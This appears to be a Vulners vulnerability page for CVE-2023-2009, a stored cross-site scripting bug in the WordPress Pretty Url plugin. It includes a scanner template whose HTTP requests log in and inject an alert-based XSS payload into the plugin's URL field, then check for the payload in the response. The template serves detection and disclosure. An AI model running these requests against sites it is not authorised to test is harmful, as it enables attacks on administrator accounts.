| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2023-2009 | 15 May 202316:43 | – | circl | |
| WordPress plugin URL field in the Pretty Url 跨站脚本漏洞 | 15 May 202300:00 | – | cnnvd | |
| CVE-2023-2009 | 15 May 202312:15 | – | cve | |
| CVE-2023-2009 Pretty Url <= 1.5.4 - Admin+ Stored XSS in plugin settings | 15 May 202312:15 | – | cvelist | |
| EUVD-2023-33539 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-2009 | 15 May 202313:15 | – | nvd | |
| CVE-2023-2009 | 15 May 202313:15 | – | osv | |
| WordPress Pretty Url Plugin <= 1.5.4 is vulnerable to Cross Site Scripting (XSS) | 26 Apr 202300:00 | – | patchstack | |
| Cross site scripting | 15 May 202313:15 | – | prion | |
| PT-2023-17407 · WordPress · Pretty Url | 15 May 202300:00 | – | ptsecurity |
id: CVE-2023-2009
info:
name: Pretty Url <= 1.5.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
impact: |
High-privilege authenticated attackers can inject stored XSS through the URL field in plugin settings, potentially compromising other administrator accounts even when unfiltered_html capability is disabled in WordPress multisite setups.
remediation: |
Update Pretty Url plugin to a version newer than 1.5.4 that properly sanitizes and escapes the URL field in plugin settings to prevent stored XSS attacks.
reference:
- https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f
- https://nvd.nist.gov/vuln/detail/CVE-2023-2009
- https://wordpress.org/plugins/pretty-url/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2023-2009
cwe-id: CWE-79
epss-score: 0.00824
epss-percentile: 0.52741
cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: pretty_url_project
product: pretty_url
framework: wordpress
tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log=((username))&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<img src=x onerror=alert(document.domain)>")'
- 'contains(body_3, "prettyurls")'
condition: and
extractors:
- type: regex
internal: true
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
# digest: 490a00463044022022869b91e5c3a9ce33599b59ab824488508b5f199980f16f7399b7a27eebcbeb022051b23e93efd73e009347e7902d9d7c8033cebd47b306ad2f0be2ed5cf12c3f11:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation